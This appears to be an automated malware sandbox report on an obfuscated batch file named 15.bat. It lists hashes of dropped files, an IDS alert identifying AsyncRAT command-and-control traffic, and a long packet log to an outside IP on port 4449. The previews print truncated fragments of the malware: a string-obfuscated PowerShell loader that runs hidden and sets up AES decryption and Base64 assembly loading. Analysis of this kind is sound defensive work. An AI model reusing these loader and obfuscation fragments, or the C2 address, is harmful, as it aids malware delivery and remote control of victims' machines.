                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text
                Category:dropped
                Size (bytes):8
                Entropy (8bit):2.75
                Encrypted:false
                SSDEEP:3:Rt:v
                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                Malicious:false
                Preview:.5.False
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (2132), with CRLF line terminators
                Category:dropped
                Size (bytes):2134
                Entropy (8bit):5.765159968838168
                Encrypted:false
                SSDEEP:48:kdSNM0GgCsFm5AIP+TKR23R98Rx+BLB0cfPBkqkwArX1xngW3JVFgntlYcW3IS:kI1T+AIG+E307+BLB0cf3S1GMonn6H
                MD5:44936E2D6C7772C5ABB7AD1399222214
                SHA1:3F8C2BE67E603E708C15E866C7F6F227A666DA4F
                SHA-256:65A32A02EE58510D7F5D7DFE3D0D7F0E5D41F31C80456A6E457ACEA9C861A7BA
                SHA-512:38CEB16C2B383395DFFD4C0EBE5DFF0BA5EE5F7252C543D7733A2CA615D4058028DC976B883DF91342B18AA117A72BFC5A96A73FBDAF51E3BC19DC37BC9B9E38
                Malicious:false
                Preview:$host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\15.bat';$MMJz='GelYestClYesurlYesrenlYestlYesProlYesceslYesslYes'.Replace('lYes', ''),'ChFGxTanFGxTgFGxTeEFGxTxFGxTteFGxTnsFGxTiFGxToFGxTnFGxT'.Replace('FGxT', ''),'EleTQWBmeTQWBnTQWBtAtTQWB'.Replace('TQWB', ''),'CrAFGseAFGsaAFGstAFGseAFGsDecAFGsryAFGsptAFGsorAFGs'.Replace('AFGs', ''),'SRlYbpRlYblRlYbiRlYbtRlYb'.Replace('RlYb', ''),'DoaAnecooaAnmpoaAnresoaAnsoaAn'.Replace('oaAn', ''),'EnHILctrHILcyHILcPoHILcinHILctHILc'.Replace('HILc', ''),'CDYnropDYnryToDYnr'.Replace('DYnr', ''),'ReaOApIdLiOApInesOApI'.Replace('OApI', ''),'IndQRQvodQRQkedQRQ'.Replace('dQRQ', ''),'TratglInstglIfotglIrmtglIFitglInatglIlBltglIotglIctglIktglI'.Replace('tglI', ''),'MbkBwaibkBwnbkBwModbkBwulbkBwebkBw'.Replace('bkBw', ''),'FroXggooXggmBaoXggseoXgg64SoXggtroXggioXggngoXgg'.Replace('oXgg', ''),'Loajyrjdjyrj'.Replace('jyrj', '');powershell -w hidden;function FBejp($JKmLP){$UerdI=[System.Security.Cryptography.Aes]::Create();$UerdI.Mode=[System.Security.Cryptogra
                File type:DOS batch file, ASCII text, with very long lines (51246), with CRLF line terminators
                Entropy (8bit):6.003197930819005
                TrID:
                  File name:15.bat
                  File size:62'382 bytes
                  MD5:1bf971e48ba0ca904319be9147a96c33
                  SHA1:75078fd8b6a000b848eb3f372e5f84fb58d5b98e
                  SHA256:74742f3e892f02c91b2f2dd9e1547ffe42681bb755b0f28b2dd602afb46af39e
                  SHA512:e24d8d46a962c1d659a742a1926c6628f9e88268449b36a93bba5def5390eca141903e329afd3eda70f79cc391f8391e9f15639918addc923819a3efe3dcc6d0
                  SSDEEP:1536:pdgEdB7d8SZXy3SMlwVdgC1mKRkm6DUL9:paEdNGSsSR3sKRkrDo
                  TLSH:5E53E1082BAB879758AAD418DFC570C709C799875DB8FAF45F5B202A21B7A3340F5723
                  File Content Preview:@echo off..set "gwAVRA=seWiBDht aWiBDhPiBWiBDh=1WiBDh &WiBDh&WiBDh sWiBDhtaWiBDhrt WiBDh"WiBDh" WiBDh/mWiBDhinWiBDh WiBDh"..set "CMXyhD=&WiBDh& eWiBDhxiWiBDhtWiBDh"..set "pEXfDe=noWiBDht WiBDhdeWiBDhfWiBDhiWiBDhneWiBDhd aWiBDhPWiBDhiBWiBDh..if %pEXfDe:WiB
                  Icon Hash:9686878b929a9886
                  Timestamp                 Protocol  SID      Message                                              Source Port  Dest Port  Source IP       Dest IP
                  04/20/24-10:06:05.477978  TCP       2850454  ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT)  4449         49730      193.222.96.128  192.168.2.4
                  Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                  Apr 20, 2024 10:06:05.059465885 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:05.261924982 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:05.262198925 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:05.274139881 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:05.477977991 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:05.483889103 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:05.690464973 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:05.744736910 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:06.648036957 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:06.902771950 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:06.902887106 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:07.155409098 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:18.809006929 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:19.056802988 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:19.057018042 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:19.262202978 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:19.307322979 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:19.509840012 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:19.519445896 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:19.775299072 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:19.775485039 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:20.025736094 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:30.979486942 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:31.228714943 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:31.228943110 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:31.432890892 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:31.479065895 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:31.681679964 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:31.683608055 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:31.931751966 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:31.931982040 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:32.181802988 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:43.151253939 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:43.400309086 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:43.400445938 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:43.604294062 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:43.650942087 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:43.853630066 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:43.855947018 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:44.103606939 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:44.103995085 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:44.353465080 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:55.323198080 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:55.572362900 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:55.572725058 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:55.776315928 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:55.822690964 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:56.025016069 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:56.027904987 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:56.275512934 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:06:56.275585890 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:06:56.525357008 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:07.495194912 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:07.755770922 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:07.756006002 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:07.961678982 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:08.010253906 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:08.212491035 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:08.214807034 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:08.463056087 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:08.463587999 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:08.712913036 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:19.666765928 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:19.934175014 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:19.934254885 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:20.141429901 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:20.198467970 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:20.401392937 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:20.406703949 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:20.650386095 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:20.651022911 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:20.900355101 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:22.026459932 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:22.275502920 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:22.275700092 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:22.480595112 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:22.528429031 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:22.730786085 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:22.732867002 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:22.984918118 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:22.985029936 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:23.228439093 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:29.729351997 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:29.973160982 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:29.973376989 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:30.190988064 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:30.247123957 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:30.451072931 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:30.460215092 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:30.717386007 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:30.718559980 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:30.964899063 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:32.480415106 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:32.736882925 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:32.744522095 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:32.948529959 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:32.996409893 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:33.198892117 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:33.200830936 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:33.449378967 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:33.449595928 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:33.700222969 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:40.229461908 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:40.479999065 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:40.480170012 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:40.684878111 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:40.732491970 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:40.934772015 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:40.942718983 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:41.185695887 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:41.185875893 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:41.446069956 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:42.604384899 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:42.856275082 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:42.856513977 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:43.061203003 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:43.119560957 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:43.322320938 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:43.324009895 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:43.573316097 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:43.573470116 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:43.824323893 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:48.057461977 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:48.305768013 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:48.312654972 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:48.515990019 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:48.560404062 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:48.762583017 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:48.808504105 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:49.792742968 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:50.040802002 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:50.041009903 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:50.300483942 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:50.916908979 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.168148994 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:51.168235064 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.372733116 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:51.510231972 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.697361946 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:51.697582960 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.699353933 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.713212967 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:51.713397980 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:51.949495077 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:51.949584007 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:52.193243980 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:52.193310976 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:52.397648096 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:52.468470097 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:52.670485020 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:52.678183079 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:52.933837891 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:07:52.934040070 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:07:53.188455105 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:03.812464952 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:04.056381941 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:04.056665897 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:04.267549038 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:04.335030079 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:04.537292004 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:04.539304972 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:04.793234110 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:04.793421984 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:05.039024115 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:14.837532043 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:14.888324976 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.090497971 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.090697050 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.091054916 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.293323040 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.293545008 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.298180103 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.298404932 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.495788097 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.497634888 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565115929 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565180063 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565220118 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565258026 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565313101 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565314054 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565320969 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565314054 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565314054 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565371037 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565386057 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565422058 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565447092 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565460920 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565465927 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565500021 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565522909 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565537930 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565547943 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565586090 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565591097 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565624952 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565637112 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565668106 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.565676928 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.565725088 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.746299982 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.796529055 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.809854031 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.810034990 CEST  49730        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.998909950 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:15.999006033 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:15.999326944 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:16.065069914 CEST  4449         49730      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.202763081 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.210491896 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:16.463388920 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.762521029 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:16.762521029 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:16.964936972 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.964996099 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.965032101 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.965065956 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:16.965301037 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:16.966142893 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.012088060 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.012819052 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.036906958 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.167553902 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167582989 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167602062 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167615891 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167634010 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167649031 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167663097 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.167794943 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.168020964 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.215383053 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.215630054 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.293126106 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:17.293221951 CEST  49738        4449       192.168.2.4     193.222.96.128
                  Apr 20, 2024 10:08:17.369858980 CEST  4449         49738      193.222.96.128  192.168.2.4
                  Apr 20, 2024 10:08:20.744885921 CEST  49730        4449       192.168.2.4     193.222.96.128
